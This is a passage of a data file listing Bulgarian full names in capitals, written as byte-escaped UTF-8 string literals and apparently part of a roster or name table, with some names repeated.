'\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\x92\xd0\x90\xd0\x9b\xd0\x95\xd0\x9d\xd0\xa2\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', 
'\xd0\x97\xd0\x9b\xd0\x90\xd0\xa2\xd0\x9a\xd0\x9e \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x97\xd0\x94\xd0\xa0\xd0\x90\xd0\x92\xd0\x9a\xd0\x9e \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x96\xd0\x95\xd0\x9b\xd0\xaf\xd0\x97\xd0\x9a\xd0\x9e \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x96\xd0\x95\xd0\x9b\xd0\xaf\xd0\x97\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x98\xd0\x91\xd0\xa0\xd0\x98\xd0\xa8\xd0\x98\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x98\xd0\xa0\xd0\x95\xd0\x9d\xd0\x90 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92\xd0\x90 \xd0\xa3\xd0\x97\xd0\xa3\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9a\xd0\x90 \xd0\x9a\xd0\x9e\xd0\x9b\xd0\x95\xd0\x92\xd0\x90 \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x9b\xd0\x90\xd0\x94\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d \xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\xa6\xd0\x9e\xd0\x9d\xd0\x95\xd0\x92', '\xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x99\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x99\xd0\x9e\xd0\x90\xd0\x9d\xd0\x90 \xd0\x9c\xd0\x98\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92\xd0\x90 \xd0\x9a\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x98\xd0\x9b\xd0\x98\xd0\xaf\xd0\x9d\xd0\x90 \xd0\x9c\xd0\x90\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x99\xd0\x9e\xd0\xa2\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x98\xd0\x9b\xd0\x98\xd0\xaf \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 
\xd0\x91\xd0\x90\xd0\xa2\xd0\x90\xd0\xa8\xd0\x9a\xd0\x98', '\xd0\x98\xd0\x92\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d\xd0\x90 \xd0\x92\xd0\x95\xd0\xa1\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92\xd0\x90', '\xd0\x98\xd0\xa0\xd0\x95\xd0\x9d\xd0\x90 \xd0\x9b\xd0\xae\xd0\x91\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa1\xd0\x9e\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b \xd0\x91\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x90\xd0\x9b\xd0\xa4\xd0\x98\xd0\x9d', '\xd0\x9a\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x90\xd0\x94\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x98\xd0\xa1\xd0\x9a\xd0\xa0\xd0\x90 \xd0\xa4\xd0\x98\xd0\x94\xd0\x9e\xd0\xa1\xd0\x9e\xd0\x92\xd0\x90 \xd0\x98\xd0\xa1\xd0\x9a\xd0\xa0\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x98\xd0\xa1\xd0\x9a\xd0\xa0\xd0\x90 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x99\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90-\xd0\x9a\xd0\x9e\xd0\x9f\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b \xd0\x94\xd0\x9e\xd0\x91\xd0\xa0\xd0\x95\xd0\x92 \xd0\x94\xd0\x9e\xd0\x91\xd0\xa0\xd0\x95\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x9d\xd0\x95\xd0\x94\xd0\x95\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x9b\xd0\xae\xd0\x91\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x92\xd0\x95\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\xa6\xd0\x98\xd0\x9f\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 
\xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 \xd0\x9c\xd0\xa3\xd0\xa0\xd0\x94\xd0\x96\xd0\x95\xd0\x92', '\xd0\x9a\xd0\x9e\xd0\xa0\xd0\x9d\xd0\x95\xd0\x9b\xd0\x98\xd0\xaf \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9d\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9a\xd0\x9e\xd0\xa0\xd0\x9d\xd0\x95\xd0\x9b\xd0\x98\xd0\xaf \xd0\x94\xd0\x9e\xd0\x91\xd0\xa0\xd0\x95\xd0\x92\xd0\x90 \xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x95\xd0\x92 \xd0\x94\xd0\x9e\xd0\x91\xd0\xa0\xd0\x95\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92 \xd0\xaf\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9b\xd0\xaa\xd0\xa7\xd0\x95\xd0\x97\xd0\x90\xd0\xa0 \xd0\x91\xd0\x9e\xd0\x93\xd0\x9e\xd0\x9c\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x90 \xd0\x9f\xd0\x95\xd0\x9d\xd0\x95\xd0\x92\xd0\x90 \xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9b\xd0\xae\xd0\x91\xd0\x95\xd0\x9d \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x90\xd0\xa2\xd0\x90\xd0\xa0\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x9c\xd0\x90\xd0\xaf \xd0\x91\xd0\x9e\xd0\x96\xd0\x98\xd0\x94\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9c\xd0\x90\xd0\x9d\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\xa2\xd0\x98\xd0\x9d \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\x97\xd0\x90\xd0\xa5\xd0\x90\xd0\xa0\xd0\x98\xd0\x95\xd0\x92', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x90\xd0\x9d\xd0\x90 \xd0\xa0\xd0\x90\xd0\x94\xd0\x95\xd0\x92\xd0\x90 \xd0\x91\xd0\x9e\xd0\xaf\xd0\x94\xd0\x96\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x90\xd0\x9d\xd0\x90 
\xd0\x93\xd0\x9e\xd0\xa1\xd0\x9f\xd0\x9e\xd0\x94\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa2\xd0\x9e\xd0\xa2\xd0\x95\xd0\x92\xd0\x90', '\xd0\x9c\xd0\x90\xd0\x93\xd0\x94\xd0\x90\xd0\x9b\xd0\x95\xd0\x9d\xd0\x90 \xd0\x9b\xd0\x90\xd0\x9c\xd0\x91\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa2\xd0\x90\xd0\xa8\xd0\x95\xd0\x92\xd0\x90', '\xd0\x9b\xd0\xae\xd0\x91\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92', '\xd0\x9b\xd0\xae\xd0\x91\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x95\xd0\x9d\xd0\x94\xd0\x90 \xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x98\xd0\x9b \xd0\xa0\xd0\x90\xd0\x99\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x98\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa5\xd0\x90\xd0\xa2 \xd0\xa1\xd0\x90\xd0\x91\xd0\xa0\xd0\x98 \xd0\x9c\xd0\x95\xd0\xa2\xd0\x98\xd0\x9d', '\xd0\x9c\xd0\x98\xd0\xa2\xd0\x9a\xd0\x9e \xd0\x96\xd0\x98\xd0\x92\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x97\xd0\x90\xd0\xa5\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x98\xd0\x9d\xd0\xa7\xd0\x9e \xd0\x9c\xd0\xaa\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9c\xd0\x98\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92', '\xd0\x9c\xd0\x98\xd0\x9b\xd0\x9a\xd0\x9e \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x91\xd0\x90\xd0\x93\xd0\x94\xd0\x90\xd0\xa1\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x98\xd0\x9b\xd0\x9a\xd0\x90 \xd0\x94\xd0\x9e\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92\xd0\x90 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9c\xd0\x98\xd0\x9b\xd0\x95\xd0\x9d\xd0\x90 
\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x94\xd0\x90\xd0\x9c\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9c\xd0\x9b\xd0\x90\xd0\x94\xd0\x95\xd0\x9d \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa7\xd0\x95\xd0\xa0\xd0\x92\xd0\x95\xd0\x9d\xd0\xaf\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\x9d\xd0\x90\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x90\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\x95\xd0\x92', '\xd0\x9d\xd0\x95\xd0\x92\xd0\x98\xd0\x9d \xd0\xa5\xd0\x90\xd0\x9b\xd0\x98\xd0\x9b \xd0\xa5\xd0\x90\xd0\xa1\xd0\x90\xd0\x9d', '\xd0\x9c\xd0\xa3\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa4\xd0\x90 \xd0\xa4\xd0\x90\xd0\xa5\xd0\xa0\xd0\x98 \xd0\x90\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94', '\xd0\x9c\xd0\xa3\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa4\xd0\x90 \xd0\xa1\xd0\x90\xd0\x9b\xd0\x98 \xd0\x9a\xd0\x90\xd0\xa0\xd0\x90\xd0\x94\xd0\x90\xd0\x99\xd0\xaa', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9f\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\x9a\xd0\xaa\xd0\x9d\xd0\x95\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x9c\xd0\xa3\xd0\xa2\xd0\x90\xd0\xa4\xd0\xa7\xd0\x98\xd0\x95\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 \xd0\x9a\xd0\xa3\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x91\xd0\x90\xd0\xa8\xd0\x95\xd0\x92', '\xd0\x9f\xd0\x90\xd0\x92\xd0\x95\xd0\x9b \xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x90\xd0\x92\xd0\x95\xd0\x9b 
\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa8\xd0\x9e\xd0\x9f\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x90\xd0\x92\xd0\x95\xd0\x9b \xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x95\xd0\x95\xd0\x92 \xd0\x93\xd0\xa3\xd0\x94\xd0\x96\xd0\x95\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x90\xd0\x92\xd0\x95\xd0\x9b \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x95\xd0\x95\xd0\x92 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\xa1\xd0\x98\xd0\x9c\xd0\x95\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x90\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\x9f\xd0\x95\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\xa5\xd0\x90\xd0\xa1\xd0\x90\xd0\x9d \xd0\x90\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\x90\xd0\x94\xd0\x95\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e \xd0\x94\xd0\x90\xd0\x9c\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x91\xd0\x98\xd0\xa1\xd0\x95\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e \xd0\x94\xd0\x90\xd0\x9c\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x91\xd0\x98\xd0\xa1\xd0\x95\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x95\xd0\xa0\xd0\x94\xd0\x96\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x90\xd0\x99\xd0\x94\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x90\xd0\x99\xd0\x94\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x9e\xd0\xa0\xd0\x90 \xd0\x98\xd0\x9b\xd0\x98\xd0\x95\xd0\x92\xd0\x90 \xd0\xaf\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b \xd0\xa1\xd0\xa2\xd0\xa0\xd0\x90\xd0\xa5\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 
\xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x90\xd0\x94\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x93\xd0\x95\xd0\xa7\xd0\x95\xd0\x92', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x9e\xd0\x92', '\xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d \xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\xa6\xd0\x9e\xd0\x9d\xd0\x95\xd0\x92', '\xd0\x98\xd0\x9b\xd0\x98\xd0\xaf \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 \xd0\x91\xd0\x90\xd0\xa2\xd0\x90\xd0\xa8\xd0\x9a\xd0\x98', '\xd0\x9a\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x90\xd0\x94\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9b\xd0\xaa\xd0\xa7\xd0\x95\xd0\x97\xd0\x90\xd0\xa0 \xd0\x91\xd0\x9e\xd0\x93\xd0\x9e\xd0\x9c\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x98\xd0\x9b \xd0\xa0\xd0\x90\xd0\x99\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x98\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x9c\xd0\xa3\xd0\xa2\xd0\x90\xd0\xa4\xd0\xa7\xd0\x98\xd0\x95\xd0\x92', '\xd0\x9f\xd0\x90\xd0\x92\xd0\x95\xd0\x9b \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa8\xd0\x9e\xd0\x9f\xd0\x9e\xd0\x92', '\xd0\x91\xd0\x9e\xd0\x99\xd0\x9a\xd0\x9e \xd0\x9c\xd0\x95\xd0\xa2\xd0\x9e\xd0\x94\xd0\x98\xd0\x95\xd0\x92 \xd0\x91\xd0\x9e\xd0\xa0\xd0\x98\xd0\xa1\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x95\xd0\x9d\xd0\xa6\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x90\xd0\xa1\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9b\xd0\x90\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x90\xd0\xa8\xd0\x9a\xd0\x9e\xd0\x92', 
'\xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x93\xd0\x9e\xd0\xa0\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x9e\xd0\x9b\xd0\x95\xd0\x9d \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\xa1\xd0\x98\xd0\x94\xd0\x95\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x95\xd0\x9b\xd0\xaf\xd0\x9d \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x94\xd0\x9e\xd0\x91\xd0\xa0\xd0\x95\xd0\x92', '\xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b \xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\x9b\xd0\x95\xd0\x92', '\xd0\x94\xd0\x95\xd0\x9b\xd0\xaf\xd0\x9d \xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9f\xd0\x95\xd0\x95\xd0\x92\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x94\xd0\x95\xd0\x9d\xd0\x98\xd0\xa6\xd0\x90 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90 \xd0\x93\xd0\x90\xd0\x94\xd0\x96\xd0\x95\xd0\x92\xd0\x90', '\xd0\x94\xd0\x95\xd0\xa1\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x9e\xd0\x92 \xd0\xa7\xd0\xa3\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x98\xd0\xa0\xd0\x95\xd0\x9d\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9a\xd0\x9e\xd0\xa6\xd0\x95\xd0\x92\xd0\x90', '\xd0\x98\xd0\x92\xd0\x90\xd0\x99\xd0\x9b\xd0\x9e \xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x9e\xd0\xa1\xd0\x9a\xd0\x9e\xd0\x92\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\x93\xd0\x90\xd0\xa0\xd0\x98\xd0\xa2\xd0\x90 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x95\xd0\x92\xd0\x90 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x98\xd0\x9b\xd0\x98\xd0\x90\xd0\x9d \xd0\xa1\xd0\x90\xd0\xa8\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9b\xd0\x98\xd0\x9b\xd0\xaf\xd0\x9d\xd0\x90 \xd0\x9f\xd0\x90\xd0\x92\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90 
